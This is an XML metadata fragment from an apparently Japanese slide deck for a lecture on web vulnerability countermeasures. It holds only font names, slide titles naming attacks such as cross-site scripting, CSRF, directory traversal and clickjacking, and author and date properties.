    <vt:vector size="150" baseType="lpstr">
      <vt:lpstr>游ゴシック</vt:lpstr>
      <vt:lpstr>游ゴシック Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office テーマ</vt:lpstr>
      <vt:lpstr>第10回 脆弱性対策 ～不正アクセスの手口と対策～</vt:lpstr>
      <vt:lpstr>※注意</vt:lpstr>
      <vt:lpstr>※注意</vt:lpstr>
      <vt:lpstr>内容</vt:lpstr>
      <vt:lpstr>Webにおける不正アクセスの被害</vt:lpstr>
      <vt:lpstr>Webにおける不正アクセスの被害</vt:lpstr>
      <vt:lpstr>Webにおける不正アクセスの被害</vt:lpstr>
      <vt:lpstr>今までの講座についての補足</vt:lpstr>
      <vt:lpstr>今までの講座の補足</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クロスサイトスクリプティング</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クロスサイトリクエストフォージェリ</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ディレクトリトラバーサル</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クリックジャッキング</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第10回 脆弱性対策 ～不正アクセスの手口と対策～</dc:title>
  <dc:creator>直哉 田中</dc:creator>
  <cp:lastModifiedBy>直哉 田中</cp:lastModifiedBy>
  <cp:revision>72</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-21T07:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-25T07:14:53Z</dcterms:modified>
</cp:coreProperties>
</file>